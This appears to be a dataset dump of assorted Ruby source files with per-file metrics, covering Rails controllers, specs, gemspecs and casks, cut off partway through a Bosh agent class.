hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e9da935ef3d5eb3d5d0c79ad3e789f670bbe1827 | 1,027 | class RewardsController < ApplicationController
after_filter :verify_authorized, except: :index
inherit_resources
belongs_to :project, finder: :find_by_permalink!
respond_to :html, :json
def index
render layout: !request.xhr?
end
def new
@reward = Reward.new(project: parent)
authorize @reward
render layout: !request.xhr?
end
def edit
authorize resource
render layout: !request.xhr?
end
def update
authorize resource
update! { project_path(parent) }
end
def create
@reward = Reward.new(permitted_params[:reward].merge(project: parent))
authorize resource
create! { project_path(parent) }
end
def destroy
authorize resource
destroy! { project_path(resource.project) }
end
def sort
authorize resource
resource.update_attribute :row_order_position, params[:reward][:row_order_position]
render nothing: true
end
private
def permitted_params
params.permit(policy(@reward || Reward).permitted_attributes)
end
end
| 20.54 | 87 | 0.717624 |
01bbff7bfad4d5f2094833ace77920e7632509fa | 1,592 | PixieStrd6Com::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Log error messages when you accidentally call methods on nil.
config.whiny_nils = true
# Show full error reports and disable caching
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
config.action_mailer.default_url_options = { :host => "localhost:3000" }
# Use SQL instead of Active Record's schema dumper when creating the test database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Print deprecation notices to the stderr
config.active_support.deprecation = :stderr
end
| 43.027027 | 85 | 0.775754 |
5d9d5351687dc121e5605d1fc5b5d3e87b567159 | 3,607 | require 'spec_helper'
describe Projects::Registry::RepositoriesController do
let(:user) { create(:user) }
let(:project) { create(:project, :private) }
before do
sign_in(user)
stub_container_registry_config(enabled: true)
end
context 'when user has access to registry' do
before do
project.add_developer(user)
end
describe 'GET index' do
context 'when root container repository exists' do
before do
create(:container_repository, :root, project: project)
end
it 'does not create root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
end
context 'when root container repository is not created' do
context 'when there are tags for this repository' do
before do
stub_container_registry_tags(repository: project.full_path,
tags: %w[rc1 latest])
end
it 'successfully renders container repositories' do
go_to_index
expect(response).to have_http_status(:ok)
end
it 'creates a root container repository' do
expect { go_to_index }.to change { ContainerRepository.all.count }.by(1)
expect(ContainerRepository.first).to be_root_repository
end
it 'json has a list of projects' do
go_to_index(format: :json)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('registry/repositories')
end
end
context 'when there are no tags for this repository' do
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'successfully renders container repositories' do
go_to_index
expect(response).to have_http_status(:ok)
end
it 'does not ensure root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
it 'responds with json if asked' do
go_to_index(format: :json)
expect(response).to have_http_status(:ok)
expect(json_response).to be_kind_of(Array)
end
end
end
end
describe 'DELETE destroy' do
context 'when root container repository exists' do
let!(:repository) do
create(:container_repository, :root, project: project)
end
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'deletes a repository' do
expect { delete_repository(repository) }.to change { ContainerRepository.all.count }.by(-1)
expect(response).to have_http_status(:no_content)
end
end
end
end
context 'when user does not have access to registry' do
describe 'GET index' do
it 'responds with 404' do
go_to_index
expect(response).to have_http_status(:not_found)
end
it 'does not ensure root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
end
end
def go_to_index(format: :html)
get :index, namespace_id: project.namespace,
project_id: project,
format: format
end
def delete_repository(repository)
delete :destroy, namespace_id: project.namespace,
project_id: project,
id: repository,
format: :json
end
end
| 28.856 | 101 | 0.613252 |
ab1f5d6dabd652646c6ce562dc6f909694065755 | 1,010 | class Admin::PostsController < Admin::BaseController
def index
@posts = Post.order((params[:order].present? ? params[:order] : "created_at") + " DESC").page(params[:page])
end
def show
@post = Post.find(params[:id])
@views = Statistic.where(model_id: @post.id).where(content_type: :visit).order(created_at: :asc)
@copies = Statistic.where(model_id: @post.id).where(content_type: :copy).order(created_at: :asc)
end
def find
@post = Post.find_by_title!(params[:title])
redirect_to admin_post_path(@post.id)
end
def destroy
@post = Post.find(params[:id])
@user = @post.user
if @post.destroy
@notification = Notification.create(user_id: @user.id, content: params[:notification_content]) if params[:notification_content].present?
create_activity(:admin_destroy_post, { post_id: @post.id, code: @post.code, post_user_id: @post.user_id, notification_content: params[:notification_content] || "" })
redirect_to admin_posts_path
end
end
end
| 36.071429 | 171 | 0.69802 |
abeaa0ef6ff03ad060374e751a26fee4de21fe00 | 166 | a, b = gets.split(' ').map(&:to_i)
# True when +v+ is a positive multiple of 3, i.e. at least 3 and evenly
# divisible by 3 (0 and negative values are rejected).
def possible?(v)
  v >= 3 && (v % 3).zero?
end
puts possible?(a) || possible?(b) || possible?(a + b) ? "Possible" : "Impossible"
| 20.75 | 81 | 0.536145 |
79dc14b0180135d74cb9cdafee98fee5c6424d06 | 346 | cask 'qlab' do
version '4.4.5'
sha256 'eab8f96f0e95c46f61555fa76e332cf35952c5f4959aad86552a28c671985410'
url "https://figure53.com/qlab/downloads/QLab-#{version}.zip"
appcast "https://figure53.com/qlab/downloads/appcast-v#{version.major}/"
name 'QLab'
homepage 'https://figure53.com/qlab/'
auto_updates true
app 'QLab.app'
end
| 24.714286 | 75 | 0.742775 |
269e09837c5ba3c38cdbc4b576086dbf592d9dad | 775 | require "spec_helper"
describe Mongoid::Extensions::FalseClass do
describe "#__sortable__" do
it "returns 0" do
expect(false.__sortable__).to eq(0)
end
end
describe "#is_a?" do
context "when provided a Boolean" do
it "returns true" do
expect(false.is_a?(Boolean)).to be true
end
end
context "when provided a FalseClass" do
it "returns true" do
expect(false.is_a?(FalseClass)).to be true
end
end
context "when provided a TrueClass" do
it "returns false" do
expect(false.is_a?(TrueClass)).to be false
end
end
context "when provided an invalid class" do
it "returns false" do
expect(false.is_a?(String)).to be false
end
end
end
end
| 18.023256 | 50 | 0.621935 |
1d644c1eb9a473d7ec4e9e59c6868d13d2be2251 | 3,071 | class ListsController < ApplicationController
before_action :set_list, except: [:new, :create, :index]
def new
@list = List.new
if params[:user_id]
user = User.find_by(id: params[:user_id])
if user
verify_user(user)
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
end
end
def create
@list = List.new(list_params)
if @list
if @list.user
verify_user(@list.user) and return
end
if @list.save
redirect_to list_path(@list)
else
flash[:notice] = @list.errors.messages.values.flatten.join("\n")
render :new
end
else
flash[:notice] = "Those are not valid list details. Please try again."
redirect_to new_user_list_path(current_user)
end
end
def show
if @list
verify_user(@list.user)
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
end
def index
if params[:user_id]
@user = User.find_by(id: params[:user_id])
if @user
verify_user(@user)
@lists = @user.lists
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
else
flash[:notice] = "That is not a valid page."
end
end
def edit
if @list
verify_user(@list.user)
else
flash[:notice] = "That is not a valid list."
redirect_to user_lists_path(current_user)
end
end
# PATCH/PUT for a list.
#
# When the submitted params reassign the list to a user, ownership is
# re-checked first (verify_user may redirect, in which case we stop).
# On a successful update the browser is sent to the list page; on
# validation failure the edit form is re-rendered with the errors.
# An unknown list id redirects back to the current user's lists.
def update
  if @list
    # Look the target user up once — the original ran the identical
    # User.find_by query twice back to back.
    target_user = User.find_by(id: params[:list][:user_id].to_i)
    verify_user(target_user) and return if target_user
    if @list.update(list_params)
      redirect_to list_path(@list)
    else
      flash[:notice] = @list.errors.messages.values.flatten.join("\n")
      render :edit
    end
  else
    # @list is nil on this branch, so the original's nested `if @list
    # then render :edit` was unreachable; only the redirect could run.
    flash[:notice] = "Those are not valid list details."
    redirect_to user_lists_path(current_user)
  end
end
# DELETE for a list: removes the list together with its items, then
# returns to the current user's list index.
def destroy
if @list
# NOTE(review): the return value of verify_user is ignored here, so
# destruction proceeds unless verify_user itself halts the action —
# confirm that verify_user redirects/raises for foreign users.
verify_user(@list.user)
# Items are destroyed one by one (one query each); presumably there is
# no dependent: :destroy association — verify on the List model.
@list.items.each {|item| item.destroy}
@list.destroy
redirect_to user_lists_path(current_user)
else
# NOTE(review): this branch sets the flash but performs no redirect or
# render, falling through to Rails' default rendering — confirm a
# destroy view exists or that this path is intended.
flash[:notice] = "That is not a valid page."
end
end
private
def list_params
params.require(:list).permit(:name, :user_id, :active)
end
def set_list
@list = List.find_by(id: params[:id])
end
end | 27.918182 | 86 | 0.499186 |
e2c73c9703de2b6136e44f46433c452ec201df35 | 2,878 | # frozen_string_literal: true
require_relative '../lib/product'
require_relative '../lib/lease_feed'
RSpec.describe LeaseFeed do
ENV['GREENSUB_TEST'] = '1'
before do
# Don't print status messages during specs
allow($stdout).to receive(:puts)
end
context "HEB's live individual subscriber feed" do
product = Product.new('heb')
feed = HEBLeaseFeed.new(product)
it "is donwloadable" do
feed.fetch
expect(feed.datastream).not_to be(nil)
end
it "is XML" do
expect(feed.datastream.xml?).to be(true)
end
it "has at least 50 records" do
expect(feed.datastream.xpath('/ACLSExport/acls').count).to be >= 50
end
describe "A new subscriber" do
sub1_id = '[email protected]'
xml = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub1_id}</email><phone>555-123-4567</phone><expirationdate>2525-01-01</expirationdate></acls></ACLSExport>"
fakefeed = HEBLeaseFeed.new(product)
fakefeed.datastream = Nokogiri::XML(xml)
sub1 = Individual.new(sub1_id)
xit "is authorized to the product" do
fakefeed.parse
expect(product.host.knows_subscriber?(sub1)).to be(true)
expect(product.subscriber_can_access?(sub1)).to be(true)
end
xit "is unauthorized when the expiration date is today" do
xml2 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub1_id}</email><phone>555-123-4567</phone><expirationdate>#{Time.now.strftime('%F')}</expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml2)
fakefeed.parse
expect(product.subscriber_can_access?(sub1)).to be(false)
end
it "skips if expirartion date is blank" do
sub3_id = "[email protected]"
sub3 = Individual.new(sub3_id)
xml3 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub3_id}</email><phone>555-123-4567</phone><expirationdate></expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml3)
fakefeed.parse
expect(product.subscriber_can_access?(sub3)).to be(false)
end
it "skips if expirartion date is 0000-00-00" do
sub4_id = "[email protected]"
sub4 = Individual.new(sub4_id)
xml4 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub4_id}</email><phone>555-123-4567</phone><expirationdate>0000-00-00</expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml4)
fakefeed.parse
expect(product.subscriber_can_access?(sub4)).to be(false)
end
end
end
end
| 44.96875 | 260 | 0.676164 |
036f5fae98a888a11acd316187a112e76a79708d | 946 | require 'spec_helper'
RSpec.describe GeoCombine::Iso19139 do
include XmlDocs
let(:iso_object){ GeoCombine::Iso19139.new(stanford_iso) }
describe '#initialize' do
it 'returns an instantiated Iso19139 object' do
expect(iso_object).to be_an GeoCombine::Iso19139
end
end
describe '#xsl_geoblacklight' do
it 'should be defined' do
expect(iso_object.xsl_geoblacklight).to be_an Nokogiri::XSLT::Stylesheet
end
end
describe '#xsl_html' do
it 'should be defined' do
expect(iso_object.xsl_geoblacklight).to be_an Nokogiri::XSLT::Stylesheet
end
end
describe '#to_geoblacklight' do
it 'should create a GeoCombine::Geoblacklight object' do
expect(iso_object.to_geoblacklight).to be_an GeoCombine::Geoblacklight
end
end
describe '#to_html' do
it 'should create a transformation of the metadata as a String' do
expect(iso_object.to_html).to be_an String
end
end
end
| 29.5625 | 78 | 0.730444 |
f796e859a46e5ed80ccb793fec5ed47b0a488cd1 | 1,864 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: { name: "",
email: "foo@invalid",
password: "foo",
password_confirmation: "bar" } }
assert_template 'users/edit'
assert_select "div.alert", "The form contains 4 errors."
end
# test "successful edit" do
# log_in_as(@user)
# get edit_user_path(@user)
# assert_template 'users/edit'
# name = "Foo Bar"
# email = "[email protected]"
# patch user_path(@user), params: { user: { name: name,
# email: email,
# password: "",
# password_confirmation: "" } }
# assert_not flash.empty?
# assert_redirected_to @user
# @user.reload
# assert_equal name, @user.name
# assert_equal email, @user.email
# end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
end
| 33.285714 | 78 | 0.498927 |
03055fdd039c8f6fd770c22e5bac8071783bc5ed | 134 | class StaticPagesController < ApplicationController
# Each action below prepares no data; Rails' implicit rendering serves
# the matching view under app/views/static_pages/.
def home
end
def support
end
def about
end
def contact
end
end
| 9.571429 | 51 | 0.723881 |
1dfee3ab16dcb126f9a5e38bf03fa3027519af58 | 1,021 | class Presenters::FacetValues::DefaultPresenter
attr_reader :count
def initialize(view, active_facets, facet_value)
@value = facet_value.value
@count = facet_value.count
@solr_index = facet_value.solr_index
@active_facets = active_facets || {}
@view = view
end
def facet_search_link
if @active_facets[@solr_index].present? && @active_facets[@solr_index].include?(@value)
@view.link_to @view.query_params_without_facet_value(@solr_index, @value), rel: 'nofollow' do
@view.concat(@view.content_tag(:input, '', type: 'checkbox', 'aria-label' => @value, checked: true,
class: 'mr-2'))
@view.concat(display)
end
else
@view.link_to @view.query_params_with_facet(@solr_index, @value), rel: 'nofollow' do
@view.concat(@view.content_tag(:input, '', type: 'checkbox', 'aria-label' => @value, class: 'mr-2'))
@view.concat(display)
end
end
end
def display
@value
end
end
| 30.939394 | 108 | 0.633692 |
08d08f17726329e4c2666625afd8e44bf0b1bbc8 | 953 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "core/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "core"
s.version = Core::VERSION
s.authors = ["Elton Silva"]
s.email = ["[email protected]"]
s.homepage = "https://github.com/codhab/core.git"
s.summary = "Summary of Core."
s.description = "Description of Core."
s.license = "MIT"
s.files = Dir["{app,config,db,lib}/***/**/*", "MIT-LICENSE", "Rakefile", "README.md"]
s.test_files = Dir["spec/***/**/*"]
s.add_dependency "rails", "~> 5.0.2"
s.add_dependency "pg"
s.add_dependency "one_signal"
s.add_dependency "validates_cpf_cnpj"
s.add_dependency "validates_timeliness"
s.add_dependency "email_validator"
s.add_dependency "file_validators"
s.add_dependency "carrierwave"
s.add_dependency "friendly_id"
s.add_dependency "haml-rails"
end | 31.766667 | 87 | 0.670514 |
61f82626c93d248bf7e3a3f7c1685d744c2516c0 | 2,217 | # -*- encoding: utf-8 -*-
# stub: sshkit 1.7.1 ruby lib
Gem::Specification.new do |s|
s.name = "sshkit"
s.version = "1.7.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Lee Hambley", "Tom Clements"]
s.date = "2015-03-02"
s.description = "A comprehensive toolkit for remotely running commands in a structured manner on groups of servers."
s.email = ["[email protected]", "[email protected]"]
s.homepage = "http://github.com/capistrano/sshkit"
s.licenses = ["GPL3"]
s.rubygems_version = "2.4.5"
s.summary = "SSHKit makes it easy to write structured, testable SSH commands in Ruby"
s.installed_by_version = "2.4.5" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_runtime_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_runtime_dependency(%q<colorize>, [">= 0.7.0"])
s.add_development_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<turn>, [">= 0"])
s.add_development_dependency(%q<unindent>, [">= 0"])
s.add_development_dependency(%q<mocha>, [">= 0"])
else
s.add_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_dependency(%q<colorize>, [">= 0.7.0"])
s.add_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<turn>, [">= 0"])
s.add_dependency(%q<unindent>, [">= 0"])
s.add_dependency(%q<mocha>, [">= 0"])
end
else
s.add_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_dependency(%q<colorize>, [">= 0.7.0"])
s.add_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<turn>, [">= 0"])
s.add_dependency(%q<unindent>, [">= 0"])
s.add_dependency(%q<mocha>, [">= 0"])
end
end
| 41.055556 | 118 | 0.608931 |
ed140cb6a7f53caa668c15a862436f99def04781 | 349 | require_relative "./dog_breeds_info/version"
require_relative "./dog_breeds_info/cli"
require_relative "./dog_breeds_info/breed_list"
require_relative "./dog_breeds_info/breed"
require_relative "./dog_breeds_info/scraper"
require 'nokogiri'
require 'open-uri'
module DogBreedsInfo
class Error < StandardError; end
# Your code goes here...
end
| 24.928571 | 47 | 0.802292 |
bf01eacb527042228c2586dc940d75af2f77ce9c | 480 | # frozen_string_literal: true
redis_url = "redis://#{ENV['REDIS_HOST']}:#{ENV['REDIS_PORT']}/#{ENV['REDIS_DB']}"
Sidekiq.configure_server do |config|
config.redis = { url: redis_url, namespace: 'sidekiq_data' }
end
Sidekiq.configure_client do |config|
config.redis = { url: redis_url, namespace: 'sidekiq_data' }
end
Sidekiq::Statistic.configure do |config|
config.log_file = 'log/sidekiq.log'
config.last_log_lines = 10_000
config.max_timelist_length = 500_000
end
| 26.666667 | 82 | 0.735417 |
01f2e13362fddbf43fed6cb49763e4aca34f996a | 572 | require 'pg'
class Peep
# Returns the message text of every stored peep.
#
# Connects to the test database when ENV['ENVIRONMENT'] == 'test',
# otherwise to the development database.
#
# @return [Array<String>] the message column of every row in peeps
def self.all
  dbname = ENV['ENVIRONMENT'] == 'test' ? 'chitter1_test' : 'chitter1'
  connection = PG.connect(dbname: dbname)
  begin
    result = connection.exec('SELECT * FROM peeps')
    result.map { |peep| peep['message'] }
  ensure
    # Release the server connection — the original leaked one per call.
    connection.close
  end
end
# Inserts a new peep.
#
# @param options [Hash] expects :mes => the message text
# @return [PG::Result] result of the INSERT
def self.create(options)
  dbname = ENV['ENVIRONMENT'] == 'test' ? 'chitter1_test' : 'chitter1'
  connection = PG.connect(dbname: dbname)
  begin
    # Parameterised statement: the original interpolated options[:mes]
    # straight into the SQL string, an injection vulnerability (and it
    # broke on any message containing a single quote).
    connection.exec_params('INSERT INTO peeps (message) VALUES($1)', [options[:mes]])
  ensure
    # Release the server connection — the original leaked one per call.
    connection.close
  end
end
end
| 24.869565 | 77 | 0.636364 |
ab6c5bfb2f5781535e9ccae0683a5196f1a90e4b | 442 | class Cache < ActiveRecord::Base
validates :cache_valid, inclusion: { in: [true, false] }
validates :cache_valid, exclusion: { in: [nil] }
validates :key, presence: true, length: { maximum: 255 }
validates :value, presence: true, length: { maximum: 4096 }
# Marks this cache entry as stale without touching its stored value.
# NOTE(review): update_attribute deliberately skips validations —
# presumably intended so invalidation can never fail; confirm.
def invalidate
update_attribute :cache_valid, false
end
# Stores a new value and marks the entry valid again; a nil/false value
# is silently ignored.
#
# NOTE(review): this overrides ActiveRecord::Base#update (which expects
# an attribute hash) with a raw-value signature — callers of the stock
# #update on this model would break; confirm this shadowing is intended.
def update(value)
if value
# Two update_attribute calls issue two separate UPDATE statements and
# skip validations on both.
update_attribute :value, value
update_attribute :cache_valid, true
end
end
end
| 24.555556 | 61 | 0.719457 |
7af261643181e12c23330ed232d48095c87216df | 853 | require_relative "../canvas_base_resolver"
module LMSGraphQL
module Resolvers
module Canvas
class GetRubricCommentsReadStateCourse < CanvasBaseResolver
type Boolean, null: false
argument :course_id, ID, required: true
argument :assignment_id, ID, required: true
argument :user_id, ID, required: true
def resolve(course_id:, assignment_id:, user_id:, get_all: false)
result = context[:canvas_api].call("GET_RUBRIC_COMMENTS_READ_STATE_COURSES").proxy(
"GET_RUBRIC_COMMENTS_READ_STATE_COURSES",
{
"course_id": course_id,
"assignment_id": assignment_id,
"user_id": user_id },
nil,
get_all,
)
get_all ? result : result.parsed_response
end
end
end
end
end | 32.807692 | 93 | 0.615475 |
e82610d79b5865eed6a7acd9d869dbcc9d7c0a92 | 786 | require "test_helper"
describe TopicsController do
include RummagerHelpers
describe "GET topic" do
describe "with a valid topic slug" do
before do
content_store_has_item("/topic/oil-and-gas", topic_example)
end
it "sets expiry headers for 30 minutes" do
get :show, params: { topic_slug: "oil-and-gas" }
assert_equal "max-age=1800, public", response.headers["Cache-Control"]
end
end
it "returns a 404 status for GET topic with an invalid sector tag" do
content_store_does_not_have_item("/topic/oil-and-gas")
get :show, params: { topic_slug: "oil-and-gas" }
assert_equal 404, response.status
end
end
def topic_example
GovukSchemas::Example.find("topic", example_name: "topic")
end
end
| 25.354839 | 78 | 0.678117 |
ed7af129cea5d585b6d666b57e0642d75c81b859 | 279 | class Label
attr_accessor :title, :color, :items
# Builds a label with the given title and colour, an empty item list,
# and a random numeric id drawn from 1..1000.
def initialize(title, color)
  @title = title
  @color = color
  @items = []
  @id = rand(1..1000)
end
# Associates +item+ with this label: appends it to the item list
# (skipping duplicates) and points the item's label back at self.
def add_item(item)
  already_listed = @items.include?(item)
  @items << item unless already_listed
  item.label = self
end
end
| 17.4375 | 50 | 0.62724 |
ff133daac0e8bf794130405d8b22b0f33a11245c | 2,057 | # frozen_string_literal: true
require 'rails_helper'
describe MVI::Models::MviProfile do
describe '#mhv_correlation_id' do
context 'with multiple ids' do
subject { build(:mvi_profile) }
it 'returns the first id' do
expect(subject.mhv_correlation_id).to eq(subject.mhv_ids.first)
end
end
context 'with a single id' do
subject { build(:mvi_profile, mhv_ids: [id]) }
let(:id) { '12345678' }
it 'returns the id' do
expect(subject.mhv_correlation_id).to eq(id)
end
end
context 'with no ids' do
subject { build(:mvi_profile, mhv_ids: nil) }
it 'returns nil' do
expect(subject.mhv_correlation_id).to be_nil
end
end
context 'with an invalid birth date' do
subject { build(:mvi_profile, birth_date: '0') }
it 'returns a nil birth_date' do
expect(subject.birth_date).to be_nil
end
end
context 'with a valid birth date' do
subject { build(:mvi_profile, birth_date: '1985-01-01') }
it 'returns a non-nil birth_date' do
expect(Date.parse(subject.birth_date)).to be_a(Date)
expect(subject.birth_date).not_to be_nil
end
end
end
describe '#normalized_suffix' do
context 'with a non-nil suffix' do
cases = {
'Jr.' => %w[jr jr. JR JR. Jr Jr. jR jR.],
'Sr.' => %w[sr sr. SR SR. Sr Sr. sR sR.],
'II' => %w[i I].repeated_permutation(2).map(&:join),
'III' => %w[i I].repeated_permutation(3).map(&:join),
'IV' => %w[iv IV Iv iV],
nil => %w[i mr ms mrs md v]
}
cases.each do |expected_result, inputs|
inputs.each do |input|
it 'returns a properly formatted suffix' do
expect(build(:mvi_profile, suffix: input).normalized_suffix).to eq(expected_result)
end
end
end
end
end
describe 'attributes' do
subject { build(:mvi_profile) }
it 'returns a icn_with_aaid' do
expect(subject.icn_with_aaid.present?).to eq true
end
end
end
| 25.7125 | 95 | 0.607681 |
ed3682da3ac59795ecf0ed1d4c2a9b8c96629968 | 297 | require 'spec_helper'
describe Cronofy::ResponseParser do
it 'should return hash from a given response' do
response = OpenStruct.new(body: '{"a": 1, "b": 2}')
response_parser = Cronofy::ResponseParser.new(response)
expect(response_parser.json).to eq({'a' => 1, 'b' => 2})
end
end
| 29.7 | 60 | 0.680135 |
ab987161a8daf498236ccc6fa43a8f69ea7bdecd | 313 | class CreateStudentAdditionalDetails < ActiveRecord::Migration
def self.up
create_table :student_additional_details do |t|
t.references :student
t.references :additional_field
t.string :additional_info
end
end
def self.down
drop_table :student_additional_details
end
end | 24.076923 | 62 | 0.741214 |
38bbed3cf72da06dc7b2ce8fdb85076119d007b1 | 4,333 | # frozen_string_literal: true
# Generated HTML is transformed back to GFM by app/assets/javascripts/behaviors/markdown/nodes/reference.js
module Banzai
module Filter
# Base class for GitLab Flavored Markdown reference filters.
#
# References within <pre>, <code>, <a>, and <style> elements are ignored.
#
# Context options:
# :project (required) - Current project, ignored if reference is cross-project.
# :only_path - Generate path-only links.
class ReferenceFilter < HTML::Pipeline::Filter
include RequestStoreReferenceCache
include OutputSafety
class << self
attr_accessor :reference_type
end
# Returns a data attribute String to attach to a reference link
#
# attributes - Hash, where the key becomes the data attribute name and the
# value is the data attribute value
#
# Examples:
#
# data_attribute(project: 1, issue: 2)
# # => "data-reference-type=\"SomeReferenceFilter\" data-project=\"1\" data-issue=\"2\""
#
# data_attribute(project: 3, merge_request: 4)
# # => "data-reference-type=\"SomeReferenceFilter\" data-project=\"3\" data-merge-request=\"4\""
#
# Returns a String
def data_attribute(attributes = {})
# Drop nil-valued entries so they don't render as data-foo="".
attributes = attributes.reject { |_, v| v.nil? }
# Fill in defaults without clobbering caller-supplied values.
attributes[:reference_type] ||= self.class.reference_type
attributes[:container] ||= 'body'
attributes[:placement] ||= 'top'
attributes[:html] ||= 'true'
# The original markdown source is stripped when the context asks for it
# (e.g. to keep the generated HTML small).
attributes.delete(:original) if context[:no_original_data]
# data-merge_request → data-merge-request; values are HTML-escaped once.
attributes.map do |key, value|
%Q(data-#{key.to_s.dasherize}="#{escape_once(value)}")
end.join(' ')
end
# XPath predicate fragment matching any ancestor element whose contents
# must not be processed (pre, code, a, style — plus blockquote when the
# context asks for it). Memoised per filter instance.
def ignore_ancestor_query
  @ignore_ancestor_query ||=
    begin
      names = %w(pre code a style)
      names += %w(blockquote) if context[:ignore_blockquotes]
      names.map { |name| "ancestor::#{name}" }.join(' or ')
    end
end
def project
context[:project]
end
def group
context[:group]
end
def skip_project_check?
context[:skip_project_check]
end
# CSS classes for a rendered reference of the given +type+; the
# has-tooltip hook is appended unless tooltip: false.
def reference_class(type, tooltip: true)
  classes = ['gfm', "gfm-#{type}"]
  classes << 'has-tooltip' if tooltip
  classes.join(' ')
end
# Ensure that a :project key exists in context
#
# Note that while the key might exist, its value could be nil!
def validate
needs :project unless skip_project_check?
end
# Iterates over all <a> and text() nodes in a document.
#
# Nodes are skipped whenever their ancestor is one of the nodes returned
# by `ignore_ancestor_query`. Link tags are not processed if they have a
# "gfm" class or the "href" attribute is empty.
def each_node
return to_enum(__method__) unless block_given?
query = %Q{descendant-or-self::text()[not(#{ignore_ancestor_query})]
| descendant-or-self::a[
not(contains(concat(" ", @class, " "), " gfm ")) and not(@href = "")
]}
doc.xpath(query).each do |node|
yield node
end
end
# Returns an Array containing all HTML nodes.
def nodes
@nodes ||= each_node.to_a
end
# Yields the link's URL and inner HTML whenever the node is a valid <a> tag.
# Unescapes the node's href and yields it together with the node's
# inner HTML — unless the unescaped link is not valid UTF-8, in which
# case nothing is yielded.
def yield_valid_link(node)
  href = CGI.unescape(node.attr('href').to_s)
  return unless href.force_encoding('UTF-8').valid_encoding?
  yield href, node.inner_html
end
def replace_text_when_pattern_matches(node, pattern)
return unless node.text =~ pattern
content = node.to_html
html = yield content
node.replace(html) unless content == html
end
def replace_link_node_with_text(node, link)
html = yield
node.replace(html) unless html == node.text
end
def replace_link_node_with_href(node, link)
html = yield
node.replace(html) unless html == link
end
def text_node?(node)
node.is_a?(Nokogiri::XML::Text)
end
def element_node?(node)
node.is_a?(Nokogiri::XML::Element)
end
end
end
end
| 29.277027 | 107 | 0.609508 |
e2030976e7e8e09299b997b9e7c5799cf83e86dd | 472 | cask "rightfont" do
version "5.9.0"
sha256 "17539732acb77bfa7c156175b82f33f4a02e8ceb15784442752d93e10722d0f1"
url "https://rightfontapp.com/update/rightfont.zip"
appcast "https://rightfontapp.com/update/appcast#{version.major}.xml"
name "RightFont"
desc "Font manager that helps preview, install, sync and manage fonts"
homepage "https://rightfontapp.com/"
auto_updates true
depends_on macos: ">= :yosemite"
app "RightFont #{version.major}.app"
end
| 29.5 | 75 | 0.756356 |
911ca8eb4a0c855dfaff83fdb4b5eebd4e83bc2b | 2,603 | # Copyright (c) 2009-2012 VMware, Inc.
module Bosh::Agent
module ApplyPlan
class Plan
attr_reader :deployment
attr_reader :jobs
attr_reader :packages
def initialize(spec)
unless spec.is_a?(Hash)
raise ArgumentError, "Invalid spec format, Hash expected, " +
"#{spec.class} given"
end
@spec = spec
@deployment = spec["deployment"]
@jobs = []
@packages = []
@config_binding = Bosh::Agent::Util.config_binding(spec)
job_spec = spec["job"]
